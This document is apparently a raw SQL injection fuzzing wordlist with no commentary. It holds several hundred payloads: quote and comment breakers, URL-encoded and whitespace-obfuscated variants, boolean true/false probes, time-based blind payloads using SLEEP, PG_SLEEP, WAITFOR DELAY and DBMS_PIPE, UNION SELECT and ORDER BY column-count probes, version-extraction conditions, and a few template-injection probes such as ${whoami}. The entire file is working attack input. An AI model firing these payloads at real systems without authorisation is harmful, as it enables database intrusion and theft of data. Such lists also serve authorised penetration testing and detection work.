'
''
"
;
)
*
%
%27
%27'
%22
%23
%3B
%29
%2A
%%2727
%25%27
'--
''--+-
'--%20--
"--%20--
%27--
%27'--
`
')
")
`)
'))
"))
`))
\
\\
\'
'+'
'%20'
'||'
'/**/--
+'+'
+''
+''
+'||'
'+--+-
+--+-
${{<%[%'"}}%\.
${1/0}
%%2727
%25%27
U+02BA
U+02B9
%CA%BA
%CA%B9
'+AND+TRUE--
'+AND+FALSE-- 
AND+1=1
AND+1=2
'AND+1='1
'AND+1='2
'+AND+1='1
'+AND+1='2
"+AND+1='1
"+AND+1='2
"AND+1='1
"AND+1='2
+AND+1=1+--+-
'+AND+1&1=1-- 
'+AND+1&1=2-- 
+AND+1=0
+AND+1=0+--+-
'+AND+1=1
'+AND+1=0
'+AND+1=1--
'+AND+1=0--
;+SLEEP(10)+--+-
;+PG_SLEEP(10)+--+-
; WAITFOR DELAY '0:0:10' -- -
; DBMS_PIPE.RECEIVE_MESSAGE('RANDSTR',10) -- -
; RANDOMBLOB(1000000000/2) -- -
'AND+7='7
'AND+7='7--
'AND+7='7'
'AND+7='7'--
'AND+3='0
'+AND+'1'='1
'+AND+'1'='2
'+AND+'1'='1--
'+AND+'1'='2--
'+AND+'1'=1
'+AND+'1'=1--
+AND+1=1+--+-
+AND+1=2+--+-
'AND%207='7
'AND%203='0
('AND+5='5)
('AND+2='0)
'+AND+(3+*+2)+=+6--
'+or+1=1;--+-
'+or+1=2;--+-
'+and+1=1;--+-
'+and+1=2;--+-
'+or+1=1+limit+1;--+-
'+and+1=1+limit+1;--+-
'%20AND%20'1'='1--%20-
'%20AND%20'1'='0--%20-
'%20AND%201=1
'%20AND%201=1--
%09and%091=1%09--
%0Dand%0D1=1%0D--
%0Cand%0C1=1%0C--
%0Band%0B1=1%0B--
%0Aand%0A1=1%0A--
%A0and%A01=1%A0--
'||+'1'=1--
'||+'1'=2--
'||+'1'=1#
'||+'1'=2#
"{AND+1=1}--
"{AND+1=2}#
'{AND+1=1}--
'{AND+1=2}#
${sleep10}
${whoami}
'${sleep10}
'${whoami}
"${sleep10}
"${whoami}
%20union%20select%201,2,@@VERSION%23
/*comment*/and/**/1=1/**/--
'/*comment*/and/**/1=1/**/--
"/*comment*/and/**/1=1/**/--
/*comment*/and/**/1=2/**/--
'/*comment*/and/**/1=2/**/--
"/*comment*/and/**/1=2/**/--
'(1)and(1)=(1)--
'(1)and(1)=(2)--
"(1)and(1)=(1)--
"(1)and(1)=(2)--
"+AND+TRUE--
"+AND+FALSE-- 
+AND+1=1
+AND+1=1+--+-
"+AND+1&1=1-- 
"+AND+1&1=2-- 
+AND+1=0
+AND+1=0+--+-
"+AND+1=1
"+AND+1=0
"+AND+1=1--
"+AND+1=0--
"AND+7='7
"AND+7='7--
"AND+7='7'
"AND+7='7'--
"AND+3='0
"+AND+'1'='1
"+AND+'1'='2
"+AND+'1'='1--
"+AND+'1'='2--
"+AND+'1'=1
"+AND+'1'=1--
+AND+1=1+--+-
+AND+1=2+--+-
"AND%207='7
"AND%203='0
("AND+5="5)
("AND+2="0)
"+AND+(3+*+2)+=+6--
"+or+1=1;--+-
"+or+1=2;--+-
"+and+1=1;--+-
"+and+1=2;--+-
"+or+1=1+limit+1;--+-
"+and+1=1+limit+1;--+-
"%20AND%20'1'='1--%20-
"%20AND%20'1'='0--%20-
"%20AND%20"1"="1--%20-
"%20AND%20"1"="0--%20-
"%20AND%201=1
"%20AND%201=1--
'+OR+IF((NOW()=SYSDATE()),SLEEP(5),1)='0
%09and%091=1%09--
%0Dand%0D1=1%0D--
%0Cand%0C1=1%0C--
%0Band%0B1=1%0B--
%0Aand%0A1=1%0A--
%A0and%A01=1%A0--
/*comment*/and/**/1=1/**/--
'/*comment*/and/**/1=1/**/--
"/*comment*/and/**/1=1/**/--
/*comment*/and/**/1=2/**/--
'/*comment*/and/**/1=2/**/--
"/*comment*/and/**/1=2/**/--
'(1)and(1)=(1)--
'(1)and(1)=(2)--
"(1)and(1)=(1)--
"(1)and(1)=(2)--
1+&&+2
1%20&&%202
1&&2
-1 || 1
-1||1
-8%20oR%208=8--
-8+oR+8=8--
8+aND+8=8--
(2)oR(2=2)--
(2)aND(2=2)--
-2/**/oR/**/2=2--
2/**/aND/**/2=2--
-5'oR'5'='5--
3'aND'3'='0--
1'&'1'='1--
1'&&'2'='1--
-1'||'1'='1--
-1'oR'1'='2--
1'aND'1'='1--
1'aND'1'='2--
'||(SELECT {SLEEP(10)})--
"||(SELECT {SLEEP(10)})--
'||{SLEEP(10)}--
"||{SLEEP(10)}--
'||({dbms_pipe.receive_message(('a'),10)})--
'||{dbms_pipe.receive_message(('a'),10)}||'--
"||{dbms_pipe.receive_message(('a'),10)}||"--
'+||+(select+'')+||+'
'+||+(select+'')+||+'--
'+||+(select+''+from+dual)+||+'
ORDER%20BY%201
ORDER%20BY%202
ORDER%20BY%2033
%20order%20by%201
%20order%20by%202
%20order%20by%2033
ORDER%20BY%201--
ORDER%20BY%202--
ORDER%20BY%201--
ORDER%20BY%205--
ORDER%20BY%207--
ORDER%20BY%2033--
%20order%20by%201--
"+OR+IF((NOW()=SYSDATE()),SLEEP(5),1)='0
%20order%20by%202--
%20order%20by%207--
%20order%20by%2033--
'%20order%20by%201--
'%20order%20by%202--
'%20order%20by%207--
"%20order%20by%201--
"%20order%20by%202--
"%20order%20by%207--
'+UNION+SELECT+NULL,NULL--
'+UNION+SELECT+NULL,NULL,NULL--
'+UNION+SELECT+NULL,NULL,NULL,NULL--
'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL--
'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL--
'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL--
"+UNION+SELECT+NULL,NULL--
"+UNION+SELECT+NULL,NULL,NULL--
"+UNION+SELECT+NULL,NULL,NULL,NULL--
"+UNION+SELECT+NULL,NULL,NULL,NULL,NULL--
"+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL--
"+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL--
'+||+sleep(10)--+-
'SLEEP(10)--
"+||+sleep(10)--+-
"SLEEP(10)--
;+||+sleep(10)--+-
;+SLEEP(10)--
;pg_sleep(10)--
;+WAITFOR DELAY+'0:0:10'+--+-
'+||+SELECT SLEEP(10)
'+||+SELECT SLEEP(10)--
'+||+(select+sleep(10))
'+||+(select+sleep(10))--+-
'+||+(SELECT+sleep(10))--+-
'+||+(WAITFOR DELAY '0:0:10')--+-
'WAITFOR DELAY '0:0:05'
"WAITFOR DELAY '0:0:05'
')'WAITFOR DELAY '0:0:05'
")'WAITFOR DELAY '0:0:05'
"+||+SELECT SLEEP(10)
"+||+SELECT SLEEP(10)--
"+||+(select+sleep(10))
"+||+(select+sleep(10))--+-
"+||+(SELECT+sleep(10))--+-
"+||+(WAITFOR DELAY '0:0:10')--+-
(dbms_pipe.receive_message(('a'),10))--+-
"+(dbms_pipe.receive_message(('a'),10))--+-
'(dbms_pipe.receive_message(('a'),10))--+-
"(dbms_pipe.receive_message(('a'),10))--+-
'+||+(dbms_pipe.receive_message(('a'),10))--+-
'+||+(SELECT+pg_sleep(10))--+-
'+||+pg_sleep(10)
'+||+pg_sleep(10)--
'||(PG_SLEEP(7))--
'||PG_SLEEP(7)--
'+||PG_SLEEP(7)/**/--
'||(SELECT 4564 FROM PG_SLEEP(10))--
'+||+CASE+WHEN+(SELECT 1)=1+THEN+PG_SLEEP(7)+ELSE+NULL+END--
'||pg_sleep%2807%29--
'||pg%5Fsleep(7)--
"+||+pg_sleep(10)
"+||+pg_sleep(10)--
"||(PG_SLEEP(7))--
"||PG_SLEEP(7)--
"+||PG_SLEEP(7)/**/--
"||(SELECT 4564 FROM PG_SLEEP(10))--
"+||+CASE WHEN+(SELECT+1)=1+THEN+PG_SLEEP(7)+ELSE+NULL+ END--
"||pg_sleep%2807%29--
"||pg%5Fsleep(7)--
benchmark(1000000000,1-1)
-benchmark(1000000000,1-1)
'||(SELECT '')||'
'||(SELECT '' FROM dual)||'
'||(SELECT '' FROM not-a-real-table)||'
'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
and%20substring(version(),1,1)like(5)
and%20substring(version(),1,1)not%20in(4,3)
and%20substring(version(),1,1)in(4,3)
and%20substring(version(),1,1)%20between%203%20and%204
true
1
1>0
2-1
0+1
1*1
1%2
1 & 1
1&1
1'
1'>'0
2'-'1
2-1'
2-1'--
0'+'1
1'*'1
1'%'2
1"
1">"0
2"-"1
0"+"1
1"*"1
1"%"2
3"&"3"="3
3"&&"2"="3
'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
-1"||"1"="1
-1"oR"1"="1
1"aND"1"="1
'+or+'1'='1
'+or+'1'='2
1`
1`>`0
2`-`1
0`+`1
1`*`1
1`%`2
1`&`1`=`1
1`&&`2`=`1
-1`||`1`=`1
-1`oR`1`=`1
1`aND`1`=`1
1')>('0
2')-('1
0')+('1
1')*('1
1')%('2
1')&'1'=('1
1')&&'1'=('1
-1')||'1'=('1
-1')oR'1'=('1
1')aND'1'=('1
1")>("0
2")-("1
0")+("1
1")*("1
1")%("2
1")&"1"=("1
1")&&"1"=("1
-1")||"1"=("1
-1")oR"1"=("1
1")aND"1"=("1
1`)>(`0
"XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
2`)-(`1
0`)+(`1
1`)*(`1
1`)%(`2
1`)&`1`=(`1
1`)&&`1`=(`1
-1`)||`1`=(`1
-1`)oR`1`=(`1
1`)aND`1`=(`1
')+AND+2222=(SELECT+COUNT(*)+FROM+ALL_USERS+T1,ALL_USERS+T2,ALL_USERS+T3,ALL_USERS+T4,ALL_USERS+T5)+AND+600>(1)+AND+('0rd'='0rd
')+AND+2222=(SELECT+COUNT(*)+FROM+ALL_USERS+T1,ALL_USERS+T2,ALL_USERS+T3,ALL_USERS+T4,ALL_USERS+T5)+AND+600>(700)+AND+('0rd'='0rd
'+AND+SUBSTR((SELECT+version()),1,1)='7'#
'+AND+SUBSTR((SELECT+version()),1,1)='0'#
'CAST((SELECT example_column FROM example_table) AS int)
"+AND+SUBSTR((SELECT+version()),1,1)='7'#
"+AND+SUBSTR((SELECT+version()),1,1)='0'#
"CAST((SELECT example_column FROM example_table) AS int)
'+AND+CASE+WHEN+1=1+THEN+1+ELSE json('')+END+AND+'A'='A
'+AND+CASE+WHEN+1=2+THEN+1+ELSE json('')+END+AND+'A'='A
"+AND+CASE+WHEN+1=1+THEN+1+ELSE json('')+END+AND+'A'='A
"+AND+CASE+WHEN+1=2+THEN+1+ELSE json('')+END+AND+'A'='A
'+AND+CASE+WHEN+1%3d1+THEN+1+ELSE+json('')+END+AND+'A'%3d'A
"+AND+CASE+WHEN+1%3d1+THEN+1+ELSE+json('')+END+AND+'A'%3d'A
'%20AND%20CASE%20WHEN%201%3d1%20THEN%201%20ELSE%20json('')%20END%20AND%20'A'%3d'A
"+AND+CASE+WHEN+1%3d1+THEN+1+ELSE+json('')+END+AND+'A'%3d'A
